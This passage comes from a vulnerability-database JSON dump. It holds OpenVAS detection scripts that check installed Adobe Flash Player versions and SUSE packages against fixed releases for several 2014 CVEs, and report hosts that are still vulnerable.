License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.903340\");\n script_version(\"2020-04-20T13:31:49+0000\");\n script_cve_id(\"CVE-2014-0498\", \"CVE-2014-0499\", \"CVE-2014-0502\");\n script_bugtraq_id(65704, 65703, 65702);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-04-20 13:31:49 +0000 (Mon, 20 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-02-24 18:04:57 +0530 (Mon, 24 Feb 2014)\");\n script_name(\"Adobe Flash Player Multiple Vulnerabilities - 01 Feb14 (Linux)\");\n\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player and is prone to multiple\nvulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Flaw is due to multiple unspecified and a double free error.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to, disclose potentially\nsensitive information and compromise a user's system.\");\n script_tag(name:\"affected\", value:\"Adobe Flash Player version before 11.2.202.341 on Linux\");\n script_tag(name:\"solution\", value:\"Update to Adobe Flash Player version 11.2.202.341 or later.\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/57057\");\n script_xref(name:\"URL\", value:\"http://helpx.adobe.com/security/products/flash-player/apsb14-07.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 SecPod\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_lin.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Linux/Ver\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"11.2.202.341\"))\n{\n report = report_fixed_ver(installed_version:playerVer, fixed_version:\"11.2.202.341\");\n security_message(port:0, data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:14:27", "description": "This host is installed with Adobe Flash Player and is prone to multiple\nvulnerabilities.", "cvss3": {}, "published": "2014-02-24T00:00:00", "type": "openvas", "title": "Adobe Flash Player Multiple Vulnerabilities - 01 Feb14 (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0498", "CVE-2014-0502", "CVE-2014-0499"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310903338", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310903338", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Multiple Vulnerabilities - 01 Feb14 (Windows)\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.903338\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2014-0498\", \"CVE-2014-0499\", \"CVE-2014-0502\");\n script_bugtraq_id(65704, 65703, 65702);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2014-02-24 18:04:57 +0530 (Mon, 24 Feb 2014)\");\n script_name(\"Adobe Flash Player Multiple Vulnerabilities - 01 Feb14 (Windows)\");\n\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player and is prone to multiple\nvulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Flaw is due to multiple unspecified and a double free error.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to, disclose potentially\nsensitive information and compromise a user's system.\");\n script_tag(name:\"affected\", value:\"Adobe Flash Player version before 11.7.700.269 and 11.8.x through 12.0.x\nbefore 12.0.0.70 on Windows\");\n script_tag(name:\"solution\", value:\"Update to Adobe Flash Player version 11.7.700.269 or 12.0.0.70 or later.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/57057\");\n script_xref(name:\"URL\", value:\"http://helpx.adobe.com/security/products/flash-player/apsb14-07.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 SecPod\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Win/Installed\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"11.7.700.269\") ||\n version_in_range(version:playerVer, test_version:\"11.8.0\", test_version2:\"12.0.0.69\"))\n{\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:39:06", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-02-25T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for flash-player (openSUSE-SU-2014:0278-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0498", "CVE-2014-0502", "CVE-2014-0499"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310850571", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850571", "sourceData": "# Copyright (C) 2014 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850571\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-02-25 16:47:57 +0530 (Tue, 25 Feb 2014)\");\n script_cve_id(\"CVE-2014-0498\", \"CVE-2014-0499\", \"CVE-2014-0502\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"openSUSE: Security Advisory for flash-player (openSUSE-SU-2014:0278-1)\");\n\n script_tag(name:\"affected\", value:\"flash-player on openSUSE 11.4\");\n\n script_tag(name:\"insight\", value:\"Adobe Flash Player was updated to 11.2.202.341: (bnc#865021)\n\n * APSB14-07, CVE-2014-0498 CVE-2014-0499 CVE-2014-0502\n\n - Contents of flashplayer_11_sa.i386.tar.gz changed back:\n spec file updated, supplementary script (update.sh)\n updated.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"openSUSE-SU\", value:\"2014:0278-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'flash-player'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE11\\.4\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE11.4\") {\n if(!isnull(res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~11.2.202.341~95.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"flash-player-gnome\", rpm:\"flash-player-gnome~11.2.202.341~95.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"flash-player-kde4\", rpm:\"flash-player-kde4~11.2.202.341~95.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:14:25", "description": "This host is installed with Adobe Flash Player and is prone to multiple\nvulnerabilities.", "cvss3": {}, "published": "2014-02-24T00:00:00", "type": "openvas", "title": "Adobe Flash Player Multiple Vulnerabilities - 01 Feb14 (Mac OS X)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0498", "CVE-2014-0502", "CVE-2014-0499"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310903339", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310903339", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Multiple Vulnerabilities - 01 Feb14 (Mac OS X)\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.903339\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2014-0498\", \"CVE-2014-0499\", \"CVE-2014-0502\");\n script_bugtraq_id(65704, 65703, 65702);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2014-02-24 18:21:06 +0530 (Mon, 24 Feb 2014)\");\n script_name(\"Adobe Flash Player Multiple Vulnerabilities - 01 Feb14 (Mac OS X)\");\n\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player and is prone to multiple\nvulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Flaw is due to multiple unspecified and a double free error.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to, disclose potentially\nsensitive information and compromise a user's system.\");\n script_tag(name:\"affected\", value:\"Adobe Flash Player version before 11.7.700.269 and 11.8.x through 12.0.x\nbefore 12.0.0.70 on Mac OS X\");\n script_tag(name:\"solution\", value:\"Update to Adobe Flash Player version 11.7.700.269 or 12.0.0.70 or later.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/57057\");\n script_xref(name:\"URL\", value:\"http://helpx.adobe.com/security/products/flash-player/apsb14-07.html\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_copyright(\"Copyright (C) 2014 SecPod\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Flash/Player/MacOSX/Version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"11.7.700.269\") ||\n version_in_range(version:playerVer, test_version:\"11.8.0\", test_version2:\"12.0.0.69\"))\n{\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:14:16", "description": "This host is installed with Adobe Flash Player and is prone to multiple\nsecurity bypass vulnerabilities.", "cvss3": {}, "published": "2014-03-20T00:00:00", "type": "openvas", "title": "Adobe Flash Player Multiple Security Bypass Vulnerabilities - 01 Feb14 (Mac OS X)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0503", "CVE-2014-0504"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310804515", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804515", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Multiple Security Bypass Vulnerabilities - 01 Feb14 (Mac OS X)\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804515\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2014-0503\", \"CVE-2014-0504\");\n script_bugtraq_id(66122, 66127);\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2014-03-20 10:50:26 +0530 (Thu, 20 Mar 2014)\");\n script_name(\"Adobe Flash Player Multiple Security Bypass Vulnerabilities - 01 Feb14 (Mac OS X)\");\n\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player and is prone to multiple\nsecurity bypass vulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Flaw are due to multiple unspecified errors.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to bypass certain security\nrestrictions and disclose potentially sensitive information.\");\n script_tag(name:\"affected\", value:\"Adobe Flash Player version before 11.7.700.272 and 11.8.x through 12.0.x\nbefore 12.0.0.77 on Mac OS X\");\n script_tag(name:\"solution\", value:\"Update to Adobe Flash Player version 11.7.700.272 or 12.0.0.77 or later.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/57271\");\n script_xref(name:\"URL\", value:\"http://helpx.adobe.com/security/products/flash-player/apsb14-08.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Flash/Player/MacOSX/Version\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"11.7.700.272\") ||\n version_in_range(version:playerVer, test_version:\"11.8.0\", test_version2:\"12.0.0.76\"))\n{\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n}\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2020-01-31T18:39:20", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-03-17T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for flash-player (openSUSE-SU-2014:0379-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0503", "CVE-2014-0504"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310850576", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850576", "sourceData": "# Copyright (C) 2014 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850576\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-03-17 13:34:20 +0530 (Mon, 17 Mar 2014)\");\n script_cve_id(\"CVE-2014-0503\", \"CVE-2014-0504\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_name(\"openSUSE: Security Advisory for flash-player (openSUSE-SU-2014:0379-1)\");\n\n script_tag(name:\"affected\", value:\"flash-player on openSUSE 11.4\");\n\n script_tag(name:\"insight\", value:\"Adobe Flash Player was updated to version 11.2.202.346 to\n fix security issues:\n\n CVE-2014-0503: A vulnerability that could be used to bypass\n the same origin policy was fixed.\n\n CVE-2014-0504: A vulnerability that could be used to read\n the contents of the clipboard was fixed.\n\n More information can be found on the referenced vendor advisory.\");\n\n script_xref(name:\"URL\", value:\"http://helpx.adobe.com/security/products/flash-player/apsb14-08.html\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"openSUSE-SU\", value:\"2014:0379-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'flash-player'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE11\\.4\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE11.4\") {\n if(!isnull(res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~11.2.202.346~99.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"flash-player-gnome\", rpm:\"flash-player-gnome~11.2.202.346~99.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"flash-player-kde4\", rpm:\"flash-player-kde4~11.2.202.346~99.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2020-04-22T17:03:07", "description": "This host is installed with Adobe Flash Player and is prone to multiple\nsecurity bypass vulnerabilities.", "cvss3": {}, "published": "2014-03-20T00:00:00", "type": "openvas", "title": "Adobe Flash Player Multiple Security Bypass Vulnerabilities - 01 Feb14 (Linux)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0503", "CVE-2014-0504"], "modified": "2020-04-20T00:00:00", "id": "OPENVAS:1361412562310804516", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804516", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Multiple Security Bypass Vulnerabilities - 01 Feb14 (Linux)\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804516\");\n script_version(\"2020-04-20T13:31:49+0000\");\n script_cve_id(\"CVE-2014-0503\", \"CVE-2014-0504\");\n script_bugtraq_id(66122, 66127);\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-04-20 13:31:49 +0000 (Mon, 20 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-03-20 10:54:21 +0530 (Thu, 20 Mar 2014)\");\n script_name(\"Adobe Flash Player Multiple Security Bypass Vulnerabilities - 01 Feb14 (Linux)\");\n\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player and is prone to multiple\nsecurity bypass vulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Flaw are due to multiple unspecified errors.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to bypass certain security\nrestrictions and disclose potentially sensitive information.\");\n script_tag(name:\"affected\", value:\"Adobe Flash Player version before 11.2.202.346 on Linux.\");\n script_tag(name:\"solution\", value:\"Update to Adobe Flash Player version 11.2.202.346 or later.\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/57271\");\n script_xref(name:\"URL\", value:\"http://helpx.adobe.com/security/products/flash-player/apsb14-08.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_lin.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Linux/Ver\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"11.2.202.346\"))\n{\n report = report_fixed_ver(installed_version:playerVer, fixed_version:\"11.2.202.346\");\n security_message(port:0, data:report);\n exit(0);\n}\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2020-01-31T18:37:14", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-10-16T00:00:00", "type": "openvas", "title": "SUSE: Security Advisory for flash-player (SUSE-SU-2014:0387-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0503", "CVE-2014-0504"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310850951", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850951", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850951\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-10-16 14:56:42 +0200 (Fri, 16 Oct 2015)\");\n script_cve_id(\"CVE-2014-0503\", \"CVE-2014-0504\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for flash-player (SUSE-SU-2014:0387-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'flash-player'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Adobe Flash Player was updated to version 11.2.202.346 to\n fix security issues:\n\n * CVE-2014-0503: A vulnerability that could be used to\n bypass the same origin policy was fixed.\n\n * CVE-2014-0504: A vulnerability that could be used to\n read the contents of the clipboard was fixed.\n\n Security Issues references:\n\n * CVE-2014-0503\n\n * CVE-2014-0504\");\n\n script_tag(name:\"affected\", value:\"flash-player on SUSE Linux Enterprise Desktop 11 SP3\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"SUSE-SU\", value:\"2014:0387-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLED11\\.0SP3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLED11.0SP3\") {\n if(!isnull(res = 